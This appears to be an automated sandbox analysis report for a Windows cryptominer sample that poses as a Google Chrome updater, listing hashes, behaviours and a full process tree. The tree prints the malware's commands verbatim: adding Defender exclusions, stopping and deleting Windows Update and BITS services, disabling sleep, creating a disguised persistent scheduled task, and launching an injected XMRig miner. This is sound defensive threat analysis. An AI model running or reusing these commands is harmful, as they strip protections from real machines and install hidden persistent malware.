Analysis
-
max time kernel
300s -
max time network
309s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
22-10-2022 04:46
Static task
static1
Behavioral task
behavioral1
Sample
303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe
Resource
win7-20220812-en
General
-
Target
303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe
-
Size
344KB
-
MD5
8355f4fcb65efd4b4beed19a8282ce80
-
SHA1
a100aee7b677a151302b13a449524f65a19156b2
-
SHA256
303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94
-
SHA512
c5792f4aa7349467191bb37053b9eea3ab047432d6aeba3fb6970f46fede8db7fcffd130bc67f5e9c50d8dfd948df2a7a950f2d56296ac277c33de430633f5ad
-
SSDEEP
6144:gq6LFGh9VpSaYmn9EqgJ/ky4yuooh1S6E2B11vkbtIlzaa8+dpf3:gnwnu4EqPyuooz14WlzaaD
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exesetup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1916-177-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1916-180-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
setup.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts setup.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
Processes:
setup.exeupdater.exepid process 540 setup.exe 1932 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1916-177-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1916-180-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe -
Loads dropped DLL 2 IoCs
Processes:
RegSvcs.exetaskeng.exepid process 908 RegSvcs.exe 1060 taskeng.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\setup.exe themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral1/memory/540-75-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-76-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-77-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-78-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-79-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-80-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-81-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida behavioral1/memory/540-87-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral1/memory/540-124-0x000000013F9E0000-0x00000001406DA000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1932-134-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-135-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-136-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-137-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-138-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-140-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-157-0x000000013F480000-0x000000014017A000-memory.dmp themida behavioral1/memory/1932-174-0x000000013F480000-0x000000014017A000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
setup.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
setup.exeupdater.exepid process 540 setup.exe 1932 updater.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exeupdater.exedescription pid process target process PID 1536 set thread context of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1932 set thread context of 876 1932 updater.exe conhost.exe PID 1932 set thread context of 1916 1932 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
setup.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 960 sc.exe 1600 sc.exe 1104 sc.exe 932 sc.exe 1080 sc.exe 1312 sc.exe 188 sc.exe 1472 sc.exe 916 sc.exe 568 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60f9c5c4e2e5d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 1420 powershell.exe 2036 powershell.exe 1832 powershell.exe 1172 powershell.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe 1916 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 1420 powershell.exe Token: SeShutdownPrivilege 1764 powercfg.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeShutdownPrivilege 1908 powercfg.exe Token: SeShutdownPrivilege 1276 powercfg.exe Token: SeShutdownPrivilege 1492 powercfg.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeShutdownPrivilege 108 powercfg.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1408 powercfg.exe Token: SeShutdownPrivilege 1192 powercfg.exe Token: SeShutdownPrivilege 628 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1128 WMIC.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1128 WMIC.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: SeLockMemoryPrivilege 1916 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exeRegSvcs.exesetup.execmd.execmd.exepowershell.exedescription pid process target process PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 1536 wrote to memory of 908 1536 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe RegSvcs.exe PID 908 wrote to memory of 540 908 RegSvcs.exe setup.exe PID 908 wrote to memory of 540 908 RegSvcs.exe setup.exe PID 908 wrote to memory of 540 908 RegSvcs.exe setup.exe PID 540 wrote to memory of 1420 540 setup.exe powershell.exe PID 540 wrote to memory of 1420 540 setup.exe powershell.exe PID 540 wrote to memory of 1420 540 setup.exe powershell.exe PID 540 wrote to memory of 1672 540 setup.exe cmd.exe PID 540 wrote to memory of 1672 540 setup.exe cmd.exe PID 540 wrote to memory of 1672 540 setup.exe cmd.exe PID 540 wrote to memory of 240 540 setup.exe cmd.exe PID 540 wrote to memory of 240 540 setup.exe cmd.exe PID 540 wrote to memory of 240 540 setup.exe cmd.exe PID 540 wrote to memory of 2036 540 setup.exe powershell.exe PID 540 wrote to memory of 2036 540 setup.exe powershell.exe PID 540 wrote to memory of 2036 540 setup.exe powershell.exe PID 1672 wrote to memory of 960 1672 cmd.exe sc.exe PID 1672 wrote to memory of 960 1672 cmd.exe sc.exe PID 1672 wrote to memory of 960 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1600 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1600 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1600 1672 cmd.exe sc.exe PID 1672 wrote to memory of 932 1672 cmd.exe sc.exe PID 1672 wrote to memory of 932 1672 cmd.exe sc.exe PID 1672 wrote to memory of 932 1672 cmd.exe sc.exe PID 240 wrote to memory of 1764 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1764 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1764 240 cmd.exe powercfg.exe PID 1672 wrote to memory of 1104 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1104 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1104 1672 cmd.exe sc.exe PID 240 wrote to memory of 1908 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1908 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1908 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1276 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1276 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1276 240 cmd.exe powercfg.exe PID 1672 wrote to memory of 1080 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1080 1672 cmd.exe sc.exe PID 1672 wrote to memory of 1080 1672 cmd.exe sc.exe PID 240 wrote to memory of 1492 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1492 240 cmd.exe powercfg.exe PID 240 wrote to memory of 1492 240 cmd.exe powercfg.exe PID 1672 wrote to memory of 1204 1672 cmd.exe reg.exe PID 1672 wrote to memory of 1204 1672 cmd.exe reg.exe PID 1672 wrote to memory of 1204 1672 cmd.exe reg.exe PID 1672 wrote to memory of 636 1672 cmd.exe reg.exe PID 1672 wrote to memory of 636 1672 cmd.exe reg.exe PID 1672 wrote to memory of 636 1672 cmd.exe reg.exe PID 2036 wrote to memory of 428 2036 powershell.exe schtasks.exe PID 2036 wrote to memory of 428 2036 powershell.exe schtasks.exe PID 2036 wrote to memory of 428 2036 powershell.exe schtasks.exe PID 1672 wrote to memory of 1976 1672 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe"C:\Users\Admin\AppData\Local\Temp\303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:960
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:932
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1104
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:1080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:1204
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:636
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:1976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:1192
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:1472
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"5⤵
- Creates scheduled task(s)
PID:428
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#hyrgjwg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵PID:1404
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8E8D254C-A1D0-4901-99C7-BD486E0657AD} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:1060 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Modifies data under HKEY_USERS
PID:1004
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1612
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1312
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:188
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1472
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:916
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵PID:1540
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵PID:940
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵PID:1500
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵PID:240
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵PID:1248
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:1660
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
PID:1468
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe sqolsuydhn3⤵PID:876
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
PID:1404 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
PID:1456
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe yaiuavjrxlzbmxlm GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gPpwmfG4wZ3KDbx5PuSQNfaXWXA/ZHUajSlAeIWD5N63⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.1MB
MD5d38b0be7a75f44a464fae4850792d85f
SHA1b2f26d385e01704e04b56bde28b3e2a1892e4e7f
SHA25633b1ee0ef1ce8e0a1f9e6b4e192eacf6f94b23836898c8ba27b0c057493a9727
SHA512d7fafa719384524906a42239f5b18a2c2859bdd68eb4fd6ae63ab653c556a88752903f711cf10b5d1f8838858fbd296997e97ebde74735d881ffadd35f09171c
-
Filesize
7.1MB
MD5d38b0be7a75f44a464fae4850792d85f
SHA1b2f26d385e01704e04b56bde28b3e2a1892e4e7f
SHA25633b1ee0ef1ce8e0a1f9e6b4e192eacf6f94b23836898c8ba27b0c057493a9727
SHA512d7fafa719384524906a42239f5b18a2c2859bdd68eb4fd6ae63ab653c556a88752903f711cf10b5d1f8838858fbd296997e97ebde74735d881ffadd35f09171c
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
7.1MB
MD50810352270005ca86d15c8ba0d2704ab
SHA16b5b3d9c32706773b5dfcc2bc6f7a2529480c6fe
SHA256dc8e45248dbc615f80a6cd7a28fbef0d925bdce86bee35762abe45efa57a7a8d
SHA512ec1fff1b05ca1e4f61f6b57b1f53eaa875587de3bfa3687d95fd705ca85480f15992d504454a17819dfa5f927cd37f67e8c9225b249ecd587ece18ed0884af80
-
Filesize
7.1MB
MD50810352270005ca86d15c8ba0d2704ab
SHA16b5b3d9c32706773b5dfcc2bc6f7a2529480c6fe
SHA256dc8e45248dbc615f80a6cd7a28fbef0d925bdce86bee35762abe45efa57a7a8d
